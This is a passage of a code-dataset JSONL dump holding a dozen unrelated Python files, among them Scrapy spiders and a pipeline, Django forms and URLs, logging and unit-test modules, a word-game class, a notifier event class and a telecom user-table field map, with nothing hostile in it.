image_url\n\n\n\tdef parse(self, response):\n\t\t# for page in range(self.pages - 10, self.pages + 1)[::-1]:\n\t\tfor page in range(self.pages + 1)[::-1]:\n\t\t\tif page > 0:\n\t\t\t\turl = \"{}/category/101/{}/\".format(self.start_urls[0], page)\n\t\t\t\tyield scrapy.Request(url, callback=self.parsePage)\n\n\n\tdef parsePage(self, response):\n\t\tposts = response.xpath(\"\"\"//div[@id=\"postlist\"]/div[@class=\"item_box\"]\"\"\")\n\t\tfor post in posts:\n\t\t\titem = ForumDuanzibarComItem()\n\t\t\ttitle = post.xpath(\"\"\"./div[@class=\"clearfix\"]/div/h3/a/text()\"\"\").extract_first()\n\t\t\tarticle_url = \"{}{}\".format(self.start_urls[0], post.xpath(\"\"\"./div[@class=\"clearfix\"]/div/h3/a/@href\"\"\").extract_first())\n\t\t\tthumbnail_src = \"{}{}\".format(self.start_urls[0], post.xpath(\"\"\"./div[@class=\"clearfix\"]/p/a/img/@src\"\"\").extract_first())\n\t\t\titem['fid'] = self.fid\n\t\t\titem['response_url'] = response.url\n\t\t\titem['title'] = title\n\t\t\titem['categories'] = self.categories\n\t\t\titem['image_urls'] = []\n\t\t\titem['thumbnail_url'] = self.image_handle_redirect(thumbnail_src, {'Referer': article_url})\n\t\t\titem['image_urls'].append(item['thumbnail_url'])\n\t\t\titem['content_url'] = article_url\n\t\t\titem['referer'] = article_url\n\t\t\titem['contents'] = []\n\t\t\tyield scrapy.Request(item['content_url'], meta={'item': item}, callback=self.parseContent)\n\n\n\tdef parseContent(self, response):\n\t\titem = response.meta['item']\n\t\timages = response.xpath(\"\"\"//div[@id=\"post_pict_box\"]/ul/li\"\"\")\n\t\tfor img in images:\n\t\t\timage_src = self.image_handle_redirect(\"{}{}\".format(self.start_urls[0], img.xpath(\"\"\"./p[@class=\"post_img\"]/a/@href\"\"\").extract_first()))\n\t\t\tif image_src:\n\t\t\t\titem['contents'].append(image_src)\n\t\t\t\tif image_src not in item['image_urls']:\n\t\t\t\t\titem['image_urls'].append(image_src)\n\t\tyield item","sub_path":"forum_duanzibar_com/forum_duanzibar_com/spiders/cosplay_toriko_com.py","file_name":"cosplay_toriko_com.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"70731045","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\n\nfrom .models import User\n\n\nclass CustomUserCreationForm(UserCreationForm):\n class Meta(UserCreationForm.Meta):\n model = User\n fields = ('email', )\n\n\nclass CustomUserChangeForm(UserChangeForm):\n class Meta(UserChangeForm.Meta):\n model = User\n fields = ('email', )\n\n\nclass UserRegistrationForm(CustomUserCreationForm):\n first_name = forms.CharField(max_length=60)\n last_name = forms.CharField(max_length=60)\n\n class Meta(CustomUserCreationForm.Meta):\n fields = CustomUserCreationForm.Meta.fields + ('first_name', 'last_name')\n\n\nclass ProfileUpdateForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ('first_name', 'last_name')\n","sub_path":"mailauth/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"357371682","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nfrom pymongo import MongoClient\n\n\nclass Lesson8ScrapyPipeline:\n def __init__(self):\n client = MongoClient('localhost', 27017)\n self.mongo_base = client.instagram\n\n def process_item(self, item, spider):\n\n if item['being_scraped'] == item['profile_owner']:\n # получаем название коллекции по типу randomuser1_followers/following\n collection = self.mongo_base[item['being_scraped']+'_followers']\n del item['being_scraped']\n\n elif item['being_scraped'] == item['follower']:\n collection = self.mongo_base[item['being_scraped'] + '_following']\n del item['being_scraped']\n\n collection.insert_one(item)\n return item\n","sub_path":"lesson8_scrapy/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"97807511","text":"#coding=utf8\r\nu''' 实现记录日志功能 \r\n默认情况下,logging将日志打印到屏幕,日志级别为WARNING;\r\n日志级别大小关系为:CRITICAL > ERROR > WARNING > INFO > DEBUG > NOTSET\r\n''' \r\n\r\nimport logging,os\r\nimport config\r\nfrom logging.handlers import RotatingFileHandler\r\n\r\nBASE_DIR = config.readConfig(\"config.conf\", \"pro_dir\", \"pro_dir\")\r\n\r\nclass Log():\r\n log_name = config.readConfig(\"config.conf\", \"log\", \"log_name\")\r\n \r\n def __init__(self,file_name=log_name):\r\n self.log_dir = os.path.join(BASE_DIR,config.readConfig(\"config.conf\", \"log\", \"log_dir\"))\r\n self.log_size = int(config.readConfig(\"config.conf\", \"log\", \"log_size\")) * 1024 * 1024\r\n self.log_backup_count = int(config.readConfig(\"config.conf\", \"log\", \"log_backup_count\"))\r\n self.log_name = file_name\r\n self.log_level = config.readConfig(\"config.conf\", \"log\", \"log_level\")\r\n self.log_level = self.log_level.lower() #防止大小写不一致的问题,大写转小写\r\n \r\n if self.log_level == \"notest\":\r\n self.log_level = logging.NOTSET\r\n \r\n elif self.log_level == \"debug\":\r\n self.log_level = logging.DEBUG\r\n \r\n elif self.log_level == \"info\":\r\n self.log_level = logging.INFO\r\n \r\n elif self.log_level == \"warning\":\r\n self.log_level = logging.WARNING\r\n \r\n elif self.log_level == \"error\":\r\n self.log_level = logging.ERROR\r\n \r\n elif self.log_level == \"critical\":\r\n self.log_level = logging.CRITICAL\r\n \r\n else:\r\n self.log_level = logging.INFO\r\n \r\n '''\r\n logging.basicConfig(level=self.log_level,\r\n format='%(asctime)s %(filename)s ---> method:%(funcName)s[line:%(lineno)d] %(levelname)s %(message)s',\r\n datefmt='%Y-%m-%d %H:%M:%S',\r\n filename = os.path.join(self.log_dir,self.log_name),\r\n filemod='w')\r\n '''\r\n logger = logging.getLogger()\r\n logger.setLevel(self.log_level)\r\n handler = RotatingFileHandler(os.path.join(self.log_dir,self.log_name),\r\n maxBytes=self.log_size,\r\n backupCount=self.log_backup_count)\r\n formatter = logging.Formatter('%(asctime)s %(filename)s ---> method:%(funcName)s[line:%(lineno)d] %(levelname)s %(message)s')\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n self.logger = logger\r\n'''\r\nif __name__ == \"__main__\":\r\n log = Log()\r\n log.info(\"this is a test info message,wa ha ha O(∩_∩)O~\")\r\n'''","sub_path":"selenium_learning/common_modules/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"33061124","text":"from common import *\nfrom authentication import *\nimport authentication\nfrom sync import sync_methods\nfrom handlers import tagHandler, syncHandler\n\n@accepted_roles(admin_roles())\ndef get():\n tags = [\n {\"name\": \"YEAR\", \"address\": \"%MW0\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"MONTH\", \"address\": \"%MW1\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"DAY\", \"address\": \"%MW2\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"HOUR\", \"address\": \"%MW3\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"MINUTE\", \"address\": \"%MW4\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"SECOND\", \"address\": \"%MW5\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"ALARM_MINUTE\", \"address\": \"%MW4:X0\", \"type\": \"alarm\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"WARNING_SECOND\", \"address\": \"%MW5:X1\", \"type\": \"warning\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"}\n ]\n res = []\n for tag in tags:\n res.append(tagHandler.insert(tag))\n for i in range(0,255):\n addr_num = i % 12\n name = \"gen_tag_%s\"%(i,)\n address = \"%%MW%s\" % (addr_num,)\n type = \"value\"\n controller_ip = \"192.168.0.1\"\n installation = \"66002174487292\"\n gen_tag = {\"name\": name, \"address\": address, \"type\": type, \"controller_ip\": controller_ip, \"installation\": installation}\n res.append(tagHandler.insert(gen_tag))\n if not (False in res or None in res):\n return OkResponse(\"Successfully added the new tag\")\n else:\n return ConflictResponse(\"Could not insert the tag for that controller/installation/customer\")\n\n","sub_path":"portal/backend/api/populate_demo_data.py","file_name":"populate_demo_data.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"1353359","text":"import unittest, socket\nfrom raygun4py import raygunmsgs\n\nclass TestRaygunMessageBuilder(unittest.TestCase):\n\n def setUp(self):\n self.builder = raygunmsgs.RaygunMessageBuilder().new()\n self.request = {\n \"headers\": {\n \"referer\": \"localhost\",\n \"user-Agent\": \"Mozilla\"\n },\n \"hostName\": \"localhost\",\n \"url\": \"/resource\",\n \"httpMethod\": \"GET\",\n \"ipAddress\": \"127.0.0.1\",\n \"queryString\": None,\n \"form\": None,\n \"rawData\": None\n }\n\n def test_machinename(self):\n self.builder.set_machine_name(socket.gethostname())\n self.assertIsNotNone(self.builder.raygunMessage.details['machineName'])\n\n def test_customdata(self):\n self.builder.set_customdata({1: \"one\"})\n self.assertIsInstance(self.builder.raygunMessage.details['userCustomData'], dict)\n\n def test_tags(self):\n self.builder.set_tags([1, 2, 3])\n self.assertIsInstance(self.builder.raygunMessage.details['tags'], list)\n\n def test_request_ip(self):\n self.builder.set_request_details(self.request)\n self.assertEqual(self.builder.raygunMessage.details['request']['iPAddress'], '127.0.0.1')\n\n def test_user(self):\n self.builder.set_user('user1')\n self.assertEqual(self.builder.raygunMessage.details['user'], { 'identifier': 'user1' })\n\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()","sub_path":"tests/test_raygunmsgs.py","file_name":"test_raygunmsgs.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307723878","text":"from persistent.mapping import PersistentMapping\nfrom zope.interface import implementer\n\nfrom substanced.content import content\nfrom substanced.folder import Folder\n\nfrom ..interfaces import (\n ITournaments,\n ITournament\n )\n\nfrom ..utils import (\n BaseContent,\n ATTENDING\n )\n\n@content(\n ITournaments,\n name='Tournament',\n icon='icon-tags',\n)\n@implementer(ITournaments)\nclass Tournaments(Folder):\n def __init__(self):\n Folder.__init__(self)\n self.title = 'Tournaments'\n\n\n@content(\n ITournament,\n name='Tournament',\n icon='icon-tags',\n)\n@implementer(ITournament)\nclass Tournament(BaseContent):\n props = None\n\n def __init__(self, external_id, title, position, props=None):\n BaseContent.__init__(self)\n self.external_id = external_id\n self.title = title\n self.position = position\n\n if props:\n self.props = PersistentMapping()\n for k, v in props.items():\n self.props[k] = v\n\n def players(self):\n \"\"\" Sorted list of players attending tournament \"\"\"\n players = list(self.get_sources(ATTENDING))\n return sorted(players, key=lambda p: p.title)\n\n\n","sub_path":"src/fastbreak/fastbreak/tournament/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"300205753","text":"import random\n\n\nclass Hand(object):\n def __init__(self, n):\n '''\n Initialize a Hand.\n\n n: integer, the size of the hand.\n '''\n assert type(n) == int\n self.HAND_SIZE = n\n self.VOWELS = 'aeiou'\n self.CONSONANTS = 'bcdfghjklmnpqrstvwxyz'\n\n # Deal a new hand\n self.dealNewHand()\n\n def dealNewHand(self):\n '''\n Deals a new hand, and sets the hand attribute to the new hand.\n '''\n # Set self.hand to a new, empty dictionary\n self.hand = {}\n\n # Build the hand\n numVowels = self.HAND_SIZE // 3\n\n for i in range(numVowels):\n x = self.VOWELS[random.randrange(0, len(self.VOWELS))]\n self.hand[x] = self.hand.get(x, 0) + 1\n\n for i in range(numVowels, self.HAND_SIZE):\n x = self.CONSONANTS[random.randrange(0, len(self.CONSONANTS))]\n self.hand[x] = self.hand.get(x, 0) + 1\n\n def setDummyHand(self, handString):\n '''\n Allows you to set a dummy hand. Useful for testing your implementation.\n\n handString: A string of letters you wish to be in the hand. Length of\n this string must be equal to self.HAND_SIZE.\n\n This method converts sets the hand attribute to a dictionary\n containing the letters of handString.\n '''\n assert len(handString) == self.HAND_SIZE, \\\n \"Length of handString ({0}) must equal length of \\\n HAND_SIZE ({1})\".format(len(handString), self.HAND_SIZE)\n self.hand = {}\n for char in handString:\n self.hand[char] = self.hand.get(char, 0) + 1\n\n def calculateLen(self):\n '''\n Calculate the length of the hand.\n '''\n ans = 0\n for k in self.hand:\n ans += self.hand[k]\n return ans\n\n def __str__(self):\n '''\n Display a string representation of the hand.\n '''\n output = ''\n hand_keys = sorted(self.hand.keys())\n for letter in hand_keys:\n for j in range(self.hand[letter]):\n output += letter\n return output\n\n def update(self, word):\n \"\"\"\n Does not assume that self.hand has all the letters in word.\n\n Updates the hand: if self.hand does have all the letters to make\n the word, modifies self.hand by using up the letters in the given word.\n\n Returns True if the word was able to be made with the letter in\n the hand; False otherwise.\n\n word: string\n returns: Boolean (if the word was or was not made)\n \"\"\"\n # Your code here\n # Pseudocode\n # 0. Get letter frequency of the word\n word_freq = {}\n for letter in word:\n word_freq[letter] = word_freq.get(letter, 0) + 1\n # 1. Check self.hand has all the letters to make the word\n invalid_letters = {key: value for key, value in word_freq.items()\n if key not in [*self.hand] or\n value > self.hand.get(letter, 0)}\n # 2. If yes, modify self.hand, then return True\n if not len(invalid_letters):\n self.hand = {key: (value - word_freq.get(key, 0))\n for key, value in self.hand.items()}\n return True\n # 3. If no, return False\n else:\n return False\n\n\nmyHand = Hand(14)\nprint(myHand)\nprint(myHand.calculateLen())\n\nmyHand.setDummyHand('cccllaapppttrr')\nprint(myHand)\nprint(myHand.calculateLen())\n\nmyHand.update('zaclaptrap')\nprint(myHand)\n","sub_path":"mit6001/week5/hand.py","file_name":"hand.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"258899853","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('tracks/', views.tracks, name='tracks-all'),\n path('tracks/top', views.tracks_top, name='tracks-top'),\n path('tracks/', views.track, name='track-single'),\n\n path('albums/', views.albums, name='albums-all'),\n path('albums/', views.album, name='album-single'),\n\n path('purchases//send', views.send_songs, name='send_songs'),\n\n path('customers/new', views.customer_new, name='customer-new'),\n path('customers//purchases', views.customer_email_purchases, name=\"customer-email-purchases\"),\n path('customers//purchases/new', views.customer_purchase_new, name=\"customer-purchase-new\")\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"516565619","text":"import wx\nfrom patternpad import ID_QUIT\nfrom patternpad.MenuBar import MenuBar\n\nclass Frame(wx.Frame):\n\tdef __init__(self, *args, **kwargs):\n\t\twx.Frame.__init__(self, title='PatternPad', *args, **kwargs)\n\n\t\tself.Bind(wx.EVT_CLOSE, self.OnClose)\n\t\tself.Bind(wx.EVT_MENU, self.OnClose, id=ID_QUIT)\n\t\t\n\t\tself.SetMenuBar(MenuBar())\n\t\tself.Show()\n\n\tdef OnClose(self, event):\n\t\t#check isSaved and prompt if not\n\t\tself.Destroy()\n","sub_path":"patternpad/Frame.py","file_name":"Frame.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"193011771","text":"import unittest\r\nfrom unittest.mock import MagicMock\r\nfrom unittest import mock\r\n\r\nimport salary\r\n\r\nclass TestSalary(unittest.TestCase):\r\n def test_calculation_salary(self):\r\n s = salary.Salary(year=2017)\r\n s.bonus_api.bonus_price = MagicMock(return_value=1)\r\n self.assertEqual(s.calculation_salary(), 101)\r\n s.bonus_api.bonus_price.assert_called_once()\r\n s.bonus_api.bonus_price.assert_called_with(year=2017)\r\n\r\n def test_calculation_salary_no_salary(self):\r\n s = salary.Salary(year=2050)\r\n s.bonus_api.bonus_price = MagicMock(return_value=0)\r\n self.assertEqual(s.calculation_salary(), 100)\r\n s.bonus_api.bonus_price.assert_not_called()\r\n\r\n @mock.patch('salary.ThirdPartyBonusRestApi.bonus_price',\r\n return_value=1)\r\n def test_calculation_salary_no_salary_patch(self, mock_bonus):\r\n s = salary.Salary(year=2017)\r\n self.assertEqual(s.calculation_salary(), 101)\r\n mock_bonus.assert_called()\r\n\r\n def test_calculation_salary_no_salary_patch_with(self):\r\n with mock.patch(\r\n 'salary.ThirdPartyBonusRestApi.bonus_price') as mock_bonus:\r\n mock_bonus.return_value = 1\r\n\r\n s = salary.Salary(year=2017)\r\n salary_price = s.calculation_salary()\r\n\r\n self.assertEqual(salary_price, 101)\r\n mock_bonus.assert_called()\r\n\r\n def setUp(self):\r\n self.patcher = mock.patch('salary.ThirdPartyBonusRestApi.bonus_price')\r\n self.mock_bonus = self.patcher.start()\r\n\r\n def tearDown():\r\n self.patcher.stop()\r\n\r\n def test_calculation_salary_no_salary_patch_patcher(self):\r\n self.mock_bonus.return_value = 1\r\n\r\n s = salary.Salary(year=2017)\r\n salary_price = s.calculation_salary()\r\n\r\n self.assertEqual(salary_price, 101)\r\n mock_bonus.assert_called()\r\n\r\n def test_calculation_salary_no_salary_patch_side_effect(self):\r\n def f(year):\r\n return 1\r\n self.mock_bonus.side_effect = ConnectionRefusedError\r\n\r\n s = salary.Salary(year=2017)\r\n salary_price = s.calculation_salary()\r\n\r\n self.assertEqual(salary_price, 100)\r\n mock_bonus.assert_called()\r\n","sub_path":"test_salary.py","file_name":"test_salary.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"380080477","text":"import json\nfrom django.conf import settings\nfrom notifier.event_handler.event import Event\n\n\nclass RunFinishedEvent(Event):\n def __init__(\n self,\n job_notifier,\n request_id,\n run_id,\n pipeline,\n pipeline_version,\n pipeline_link,\n output_directory,\n run_status,\n tags,\n running,\n completed,\n failed,\n total,\n operator_run_id,\n lsf_log_location,\n input_json_location,\n job_group_id,\n ):\n self.job_notifier = job_notifier\n self.request_id = request_id\n self.pipeline = pipeline\n self.pipeline_version = pipeline_version\n self.pipeline_link = pipeline_link\n self.output_directory = output_directory\n self.run_id = run_id\n self.run_status = run_status\n self.tags = tags\n self.running = running\n self.completed = completed\n self.failed = failed\n self.total = total\n self.operator_run_id = operator_run_id\n self.lsf_log_location = lsf_log_location\n self.input_json_location = input_json_location\n self.job_group_id = job_group_id\n\n @classmethod\n def get_type(cls):\n return \"RunFinishedEvent\"\n\n @classmethod\n def get_method(cls):\n return \"process_run_completed\"\n\n def __str__(self):\n RUN_TEMPLATE = \"\"\"\n\n Run Id: {run_id}\n Pipeline: {pipeline_name}\n Pipeline Link: {pipeline_link}\n Output Directory: {output_directory}\n {tags}\n Status: {status}\n Link: {link}\n LSF Log Location: {lsf_log_location}\n inputs.json Location: {inputs_json_location}\n \n _____________________________________________\n \n {run_status}\n \n Running: {running}\n Completed: {completed}\n Failed: {failed}\n \n TOTAL: {total}\n \\n\n {rerun_info}\n \"\"\"\n link = \"%s%s%s\\n\" % (settings.BEAGLE_URL, \"/v0/run/api/\", self.run_id)\n if self.operator_run_id:\n status = \"OperatorRun {operator_run} status\".format(operator_run=self.operator_run_id)\n else:\n status = \"Run status\"\n tags = \"\"\n run_ids = None\n for k, v in self.tags.items():\n tags += f\"{k}: {json.dumps(v) if isinstance(v, list) or isinstance(v, dict) else str(v)}\\n\"\n if k == \"argos_run_ids\":\n run_ids = v\n\n rerun_json = {}\n rerun_json[\"pipelines\"] = [self.pipeline]\n rerun_json[\"pipeline_versions\"] = [self.pipeline_version]\n rerun_json[\"job_group_id\"] = self.job_group_id\n if run_ids:\n rerun_json[\"run_ids\"] = run_ids\n else:\n rerun_json[\"request_ids\"] = self.request_id\n\n if self.run_status == \"FAILED\":\n rerun_str = f\"\"\"\n API Body for re-run:\n \n {json.dumps(rerun_json)}\n \"\"\"\n else:\n rerun_str = \"\"\n\n return RUN_TEMPLATE.format(\n run_id=self.run_id,\n pipeline_name=self.pipeline,\n pipeline_link=self.pipeline_link,\n status=self.run_status,\n link=link,\n running=str(self.running),\n completed=str(self.completed),\n failed=str(self.failed),\n total=str(self.total),\n tags=tags,\n run_status=status,\n output_directory=self.output_directory,\n lsf_log_location=self.lsf_log_location,\n inputs_json_location=self.input_json_location,\n rerun_info=rerun_str,\n )\n","sub_path":"notifier/events/run_finished_event.py","file_name":"run_finished_event.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"132501426","text":"#首先定义字典,用于应相应的二级选项,主键对应页面选项,值对应数据库字段名\nusr_basic_info_dict ={\n \"ID\":\"ID\",\n \"手机号码\":\"MSISDN\",\n \"手机号注册城市\":\"CITY\",\n \"手机号注册区县\":\"AREA\",\n \"手机号注册乡镇\":\"AREA1\",\n \"农村城市属性\":\"OVERLAY_AREA\",\n \"用户星级\":\"STAR_TYPE\",\n \"入网时间\":\"START_DATE\",\n \"在网时长\":\"ONLINE_TIME\",\n \"号码归属地\":\"ATTRIB_ADDR\",\n}\nusr_expenses_dict={\n \"ID\":\"ID\",\n \"手机号码\":\"MSISDN\",\n \"主套餐名称\":\"PACKAGES_NAME\",\n \"是否500M以上流量或套餐订购用户\":\"UP_500M_USER\",\n \"主套餐加附加套餐包含流量\":\"FLOWS\",\n \"是否校园客户\":\"COLLEGE_USER\",\n \"是否超套餐流量用户\":\"OVER_PACKGES_USER\",\n \"近三个月月均ARPU\":\"LAST3M_AVG_ARPU\",\n \"近三个月月均DOU\":\"LAST3M_AVG_DOU\"\n}\nusr_location={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"用户经度\":\"LONGITUDE\",\n \"用户纬度\":\"LATITUDE\",\n \"用户常驻小区\":\"CELL\",\n}\ntac_imei_relation={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"终端品牌\":\"BRAND\",\n \"终端型号\":\"TYPE\",\n}\nusr_app_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"TOP1APP名称\":\"TOP1_APP_NAME\",\n \"TOP2APP名称\":\"TOP2_APP_NAME\",\n \"TOP3APP名称\":\"TOP3_APP_NAME\",\n \"TOP4APP名称\":\"TOP4_APP_NAME\",\n \"TOP5APP名称\":\"TOP5_APP_NAME\"\n}\nusr_app_rank={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"TOP1APP名称\": \"TOP1_APP_NAME\",\n \"TOP2APP名称\": \"TOP2_APP_NAME\",\n \"TOP3APP名称\": \"TOP3_APP_NAME\",\n \"TOP4APP名称\": \"TOP4_APP_NAME\",\n \"TOP5APP名称\": \"TOP5_APP_NAME\",\n \"TOP1APP流量\":\"TOP1_DATA\",\n \"TOP2APP流量\":\"TOP2_DATA\",\n \"TOP3APP流量\":\"TOP3_DATA\",\n \"TOP4APP流量\":\"TOP4_DATA\",\n \"TOP5APP流量\":\"TOP5_DATA\",\n}\nusr_cover_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"MR采样点\":\"SUM_POINT\",\n \"MR弱采样点\":\"POOR_POINT\",\n \"低于-100的采样点\":\"WEAK_POINT\",\n \"平均RSRP\":\"AVG_RSRP\",\n \"大于-100的覆盖率\":\"MR_RATE_100\",\n \"MR覆盖率\":\"MR_RATE\",\n \"脱网率\":\"OFF_RATE\",\n \"差PHR率\":\"BAD_PHR_RATE\",\n}\nusr_complt_record={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"是否离网预警用户\":\"IF_RISK_USER\",\n \"离网预警原因\":\"POLICY_PRODUCT\",\n \"是否投诉用户\":\"IF_COMPLAINT_USER\",\n \"投诉原因1\":\"REASON1\",\n \"投诉原因2\":\"REASON2\",\n \"投诉业务\":\"BUSINESS\",\n \"是否不满意用户\":\"IF_DISCONTENT_USER\",\n \"不满意原因\":\"RFD\",\n \"维系措施\":\"DFW\",\n \"是否校园客户\":\"COLLEGE_USR\",\n \"超套餐流量客户\":\"OVER_PACKGES_USER\"\n}\nusr_call_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"寻呼成功率\":\"PAGING_RATE\",\n \"掉话率\":\"DC_RATE\",\n}\nusr_speed_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"全业务下行速率\":\"DL_SPEED\",\n \"大包下行速率\":\"BP_DL_SPEED\",\n \"大包下行流量\":\"BP_DL_DATA\",\n \"大包下行时长\":\"BP_DL_DURA\",\n \"全业务上行速率\":\"UL_SPEED\",\n \"大包上行速率\":\"BP_UL_SPEED\",\n \"小包下行速率\":\"SP_DL_DELAY\",\n \"小包上行速率\":\"SP_UL_DELAY\",\n}\nusr_ete_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"HTTP响应成功率\":\"HTTP_RES_RATE\",\n \"HTTP请求次数\":\"HTTP_ATT\",\n \"HTTP响应时延\":\"HTTP_RES_DELAY\",\n \"TCP核心网成功率\":\"TCP_CORE_RATE\",\n \"TCP核心网时延\":\"TCP_CORE_DELAY \",\n \"TCP无线成功率\":\"TCP_RADIO_RATE\",\n \"TCP无线时延\":\"TCP_RADIO_DELAY\",\n \"TCP下行重传率\":\"TCP_DL_RE_RATE\",\n \"TCP上行重传率\":\"TCP_UL_RE_RATE\",\n \"TCP重传率\":\"TCP_RE_RATE\",\n \"页面响应时延\":\"PAGE_RES_DELAY\",\n \"页面响应次数\":\"PAGE_RES_SESSION\",\n}\nusr_core_pecpt={\n \"ID\":\"ID\",\n \"电话号码\":\"MSISDN\",\n \"差RIP率\":\"BAD_RIP_RATE\",\n \"切换成功率\":\"HO_RATE\",\n \"服务请求成功率\":\"SR_RATE\",\n \"附着成功率\":\"ATTACH_RATE\",\n \"PDN连接成功率\":\"PDN_RATE\",\n \"INITIAL成功率\":\"INITIAL_RATE\",\n \"TAU成功率\":\"TAU_RATE\",\n}\n\ntable_dict={\n \"用户基本信息表\":usr_basic_info_dict,\n \"用户消费情况表\":usr_expenses_dict,\n \"用户位置情况表\":usr_location,\n \"用户终端情况表\":tac_imei_relation,\n \"用户APP感知表\":usr_app_pecpt,\n \"用户APP偏好表\":usr_app_rank,\n \"用户覆盖感知表\":usr_cover_pecpt,\n \"用户投诉记录表\":usr_complt_record,\n \"用户通话情况表\":usr_call_pecpt,\n \"用户速率感知表\":usr_speed_pecpt,\n \"用户端到端情况表\":usr_ete_pecpt,\n \"用户核心网感知表\":usr_core_pecpt,\n};\n\n#表的字典,对应不同的不同的表名\ntable_name_dict={\n \"用户基本信息表\":\"usr_basic_info\",\n \"用户消费情况表\":\"usr_expenses\",\n \"用户位置情况表\":\"usr_location\",\n \"用户终端情况表\":\"tac_imei_relation\",\n \"用户APP感知表\":\"usr_app_pecpt\",\n \"用户APP偏好表\":\"usr_app_rank\",\n \"用户覆盖感知表\":\"usr_cover_pecpt\",\n \"用户投诉记录表\":\"usr_complt_record\",\n \"用户通话情况表\":\"usr_call_pecpt\",\n \"用户速率感知表\":\"usr_speed_pecpt\",\n \"用户端到端情况表\":\"usr_ete_pecpt\",\n \"用户核心网感知表\":\"usr_core_pecpt\",\n};\n#以下将使用各种规则\nbijiao={\n \"等于\":\"=\",\n \"大于\":\">\",\n \"小于\":\"<\",\n}\nget_value={\n \"计数\":\"\",\n \"求和\":\"\",\n \"求平均值\":\"\",\n \"求方差\":\"\",\n}\n\ndef a(r):\n if r:\n print(\"good\");\n return\n print(\"bad\");\n return;\n\na(False);\n\n","sub_path":"user/db_data.py","file_name":"db_data.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292980089","text":"from collections import deque\n\nN, M = map(int, input().split())\nMOD = 10**9 + 7\nINF = float(\"inf\")\n\ng = [[] for _ in range(N)]\nalready = [False for _ in range(N)]\nnum = [0 for _ in range(N)]\nnum[0] += 1\ncosts = [INF for _ in range(N)]\n\nqueue = deque()\n\nfor _ in range(M):\n tmp = list(map(int, input().split()))\n g[tmp[0]-1].append(tmp[1]-1)\n g[tmp[1]-1].append(tmp[0]-1)\n\nqueue.append([0, 0])\n\nwhile queue:\n now, cost = queue.popleft()\n \n if N-1 == now:\n break\n if already[now]:\n continue\n already[now] = True\n \n for i in g[now]:\n if costs[i] > cost:\n costs[i] = cost\n num[i] = num[now]\n num[i] %= MOD\n queue.append([i, cost+1])\n elif costs[i] == cost:\n num[i] += num[now]\n num[i] %= MOD\n\nprint(num[N-1])\n ","sub_path":"contest/abc211/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"232007449","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n Script to remove specific labels from a 